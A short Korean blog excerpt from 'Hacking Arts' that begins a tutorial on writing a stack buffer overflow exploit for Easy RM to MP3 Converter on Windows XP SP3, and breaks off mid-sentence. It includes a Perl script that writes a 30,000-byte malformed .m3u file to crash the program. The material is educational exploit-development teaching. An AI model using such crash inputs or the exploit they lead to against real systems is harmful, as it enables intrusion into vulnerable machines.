Hacking Arts

1.스택 기반 오버플로우 2009년 7월 17일 발표된 Easy Rm to MP3 Converter에 존재하는 취약점을 예로 explot을 작성해봅니다.이전에 발표된 취약점이라 CVE사이트를 돌아다니다가 취약점이 존재하는 배포판의 프로그램을 찾는데 성공하였고 그 프로그램을 설치한 뒤 문서에 맞게 실행하였습니다. 일단은 단순 BOF라 system의 공격방법과 공격방식은 동일합니다. 그리고 Win XP SP3에서 실행하였습니다. 일단 my $file = "crash.m3u"; my $junk = "\x41" x 30000; open($FILE, ">$file"); print $FILE "$junk"; close($FILE); print "m3u File Createed Successfully \n" 위의 p..